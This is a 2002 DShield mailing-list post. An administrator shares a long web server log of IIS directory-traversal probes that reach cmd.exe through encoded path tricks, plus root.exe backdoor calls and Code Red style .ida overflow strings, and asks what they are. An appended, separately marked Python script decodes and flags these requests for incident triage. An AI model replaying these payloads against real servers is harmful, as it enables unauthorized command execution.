[Dshield] Okay, I'm stumped.

Preston G. Simpson preston.simpson at sfrlaw.com
Wed May 8 16:41:42 GMT 2002


	Doing more digging through the log entries, I find this *long* sequence
(apologies in advance for the length): 

-- BEGIN EXCERPT --

209.195.62.146 - - [27/Apr/2002:12:12:54 -0400] "GET /galaxy_39604.39950
HTTP/1.0" 404 212 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 -
"-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 -
"-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0"
200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0"
400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200
- "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400
0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD
/msadc/root.exe?/c+dir HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:58 -0400] "HEAD
/scripts/root.exe?/c+dir+C:\ HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:58 -0400] "HEAD
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 -
"-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 0 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/exchange/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "HEAD
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 - "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "GET /NULL.printer
HTTP/1.1" 404 218 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:12:59 -0400] "GET
/NULL.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=a HTTP/1.0"
404 202 "-" "-"
209.195.62.146 - - [27/Apr/2002:12:13:00 -0400] "GET /NULL.idq?HTTP/1.1
404 Not
FouAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=a HTTP/1.0" 404 202 "-" "-"

-- END EXCERPT --

	I've been looking online for a while, trying to find out what exactly
this is. Evidently it's showing up in other logs as well, but I can't seem
to find a description of what this is anywhere. Does anyone know what this
is? It looks like some sort of strange Nimda/Code Red hybrid, but there
are other things in there that I don't recognize from
either one.
	I would be tempted to say that it's an attack script, except that
the initial line (GET /galaxy_39604.39950 [...]) isn't always the same
in the examples I've seen. Ideas?

--Preston G. Simpson
  IS Services
  preston.simpson at sfrlaw.com
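Added example, not part of the post or of anything the list published: a small Python triage routine that parses lines in the excerpt's log format, decodes the encodings the scanner cycles through (double percent-encoding such as %255c and %%35c, and the overlong UTF-8 pairs %C0%AF, %C1%1C and %C1%9C that old IIS builds treated as path separators) the way a permissive server did, and labels requests that traverse to cmd.exe, call root.exe, or probe the .ida/.idq ISAPI extensions. The sample lines are re-joined copies of lines from the excerpt; the label names and the two-round decode limit are my own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote
# Common Log Format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')
# Overlong UTF-8 pairs that old IIS builds accepted as path separators
OVERLONG = {"%c0%af": "/", "%c1%1c": "\\", "%c1%9c": "\\"}

def normalize(path, rounds=2):
    """Decode like a permissive server: map overlong separators, then percent-decode twice."""
    p = path.lower()
    for _ in range(rounds):
        for seq, sep in OVERLONG.items():
            p = p.replace(seq, sep)
        p = unquote(p)  # second pass turns %5c (from %255c or %%35c) into a backslash
    return p.replace("\\", "/")

def classify(path):
    """Label a hostile request path, or return None for anything else."""
    norm = normalize(path)
    if re.search(r"\.id[aq]\?", norm):
        return "isapi-probe"  # .ida/.idq with a query string: Code Red style probe
    if "../" in norm and "winnt/system32/cmd.exe" in norm:
        return "cmd.exe-traversal"  # Unicode / double-decode directory traversal
    if "root.exe" in norm:
        return "root.exe"  # copy of cmd.exe left behind by earlier worm infections
    return None

def scan(lines):
    """Parse log lines; return flagged (ip, status, label) tuples and per-ip counts."""
    hits, per_ip = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status = m.groups()
        label = classify(path)
        if label:
            hits.append((ip, int(status), label))
            per_ip[ip] += 1
    return hits, per_ip

# Constructed sample: five lines re-joined from the wrapped excerpt above
SAMPLE = [
    '209.195.62.146 - - [27/Apr/2002:12:12:54 -0400] "GET /galaxy_39604.39950 HTTP/1.0" 404 212 "-" "-"',
    '209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 200 - "-" "-"',
    '209.195.62.146 - - [27/Apr/2002:12:12:55 -0400] "HEAD /scripts/..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 200 - "-" "-"',
    '209.195.62.146 - - [27/Apr/2002:12:12:56 -0400] "HEAD /msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\\ HTTP/1.0" 400 0 "-" "-"',
    '209.195.62.146 - - [27/Apr/2002:12:12:57 -0400] "HEAD /scripts/root.exe?/c+dir+C:\\ HTTP/1.0" 200 - "-" "-"',
]
```

The status code is kept in each hit so that responses other than 400/404 on these paths can be pulled out for closer inspection of the server first.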
